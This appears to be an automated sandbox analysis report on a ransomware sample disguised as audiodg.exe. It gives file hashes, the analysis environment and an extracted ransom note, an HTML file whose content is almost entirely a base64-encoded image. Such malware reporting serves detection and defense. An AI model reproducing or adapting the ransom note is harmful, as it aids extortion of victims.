a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f

Resubmissions

12/03/2023, 23:15

230312-28yjbafg64 10

14/11/2021, 04:39

211114-e9588afhc8 10

Analysis

max time kernel
453s
max time network
428s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
12/03/2023, 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

audiodg.exe
Size

1.1MB
MD5

7b760f60fff500d3c7c408a8bc158e0e
SHA1

a4b41efc63460f980130b67eb33c0bd061206744
SHA256

a0ccb9019b90716c8ee1bc0829e0e04cf7166be2f25987abbc8987e65cef2e6f
SHA512

13662b1447806779d82a29fbb931ec8d400adacd9074c4bbce8db8afd34bbf0c87e43b7790c1631b8d4edc870dbf5348773beadea59a3f73438cdb072c24ae75
SSDEEP

24576:uTRIYouZxVPjy+Q7WX6nHvjAbDbuqxXePt:tYouZL7y+QqX6nPjRq4t

Score

10^/10

ransomware

Malware Config

Extracted

Path

C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

Ransom Note

<table align ="center" width="50%" style="border:1px solid darkblue;"><div class="container"><tr><th><img style="position:relative;z-index:1; width: 100%" src = "data: image/png;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDABsSFBcUERsXFhceHBsgKEIrKCUlKFE6PTBCYFVlZF9VXVtqeJmBanGQc1tdhbWGkJ6jq62rZ4C8ybqmx5moq6T/2wBDARweHigjKE4rK06kbl1upKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKSkpKT/wAARCAFeBBoDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDG8x/77fnR5j/32/Om0VoSO8yT++350eY/99vzptLjHX8qAHB5P77Y+tHmv2dvzphOaKAHeZJ/fb86PMf++3502igB3mP/AH2/OjzJP77fnTaKAHeY/wDfb86PMk/vt+dNooAd5j/32/OjzJP77fnTaKAH+Y/99vzo8x/77fnTKKAHeY/99vzpfMf++350yigB/mP/AH2/OjzH/vt+dMooAf5j/wB9vzo8x/77fnTKKAH+Y/8Afb86PMf++350yigB/mP/AH2/OjzH/vt+dMooAf5j4++350eY/wDfb86bRQId5rj+NvzpfMc9Hb86jooAeZJP77fnR5j/AN9vzpM54P50mMGgB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502igB3mP/fb86PMf++3502gUAO8x/wC+350okc8b2/OmUvQUAO8x/wC+350eY/8Afb86aeRmkoAf5j/32/OjzH/vt+dNoFADvMf++350eY/99vzptFADvMf++350eY/99vzptFADvMf++350eY/99vzptFAD/Mf++350eY/99vzptJQA/wAx/wC+350eY/8Afb86bRQA7zH/AL7fnR5j/wB9vzptFADvMf8Avt+dHmP/AH2/Om0UAO8x/wC+350eY/8Afb86bRQA7zH/AL7fnS+Y/wDfb86ZRQA/zH/vt+dHmP8A32/Om0UAO8x/77fnR5j/AN9vzptFADvMf++350eY/wDfb86bRQA7zH/vt+dHmP8A32/Om0UAO8x/77fnS+Y/99vzplLQId5j/wB9vzo8x/77fnTaKYDvMf8Avt+dHmP/AH2/Om0UAO8x/wC+350eY/8Afb86bRQA7zH/AL7fnR5j/wB9vzptFADvMf8Avt+dL5j/AN9vzplFAD/Mf+8350eY/wDeb86bRQA7e/8Afb86N7/3m/Om0UAO8x/7zfnRvf8AvH86bRQA7zH/ALzfnR5j/wB4/nTaKAH73/vH86N7/wB4/nTRQKAHeY/94/nRvf8AvH86bRQA7e/94/nRvf8AvH86bRQA7e/94/nS73/vH86bRQA7e/8AeP50b3/vH86bRQA7e/8AeP50b3/vH86bRQIdvbH3j+dG9/7x/Om0tAC73/vH86N7/wB4/nTaKAHb3/vH86N7/wB4/nSUUALvb+8fzo3v/eP502loAXe/94/nRvf+8fzptFADt7/3j+dG9/7x/Om0UAO3v/eP50b3/vH86bRQA7e/94/nSq7ZzuPHvTKd2oAXe394/nRvb+8fzptFADt7f3j+dG9/7x/Om0UAP3MT94/nQXYn7x/OkHQ0lADt7f3j+dG9v7x/Om0UAO3t/eP512Fr/wAesX+4P5Vxtdla/wDHrD/uL/KpkVE4Oiil6fWmMOn1pKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiloASilpKACiiigAooooAKWikoAWijtSUCCiiigYU7NNpaBC4/Kko6Up/SgBKKKKACiiigAooooAKKKKAAUUGigBQcUEYpKXqPpQA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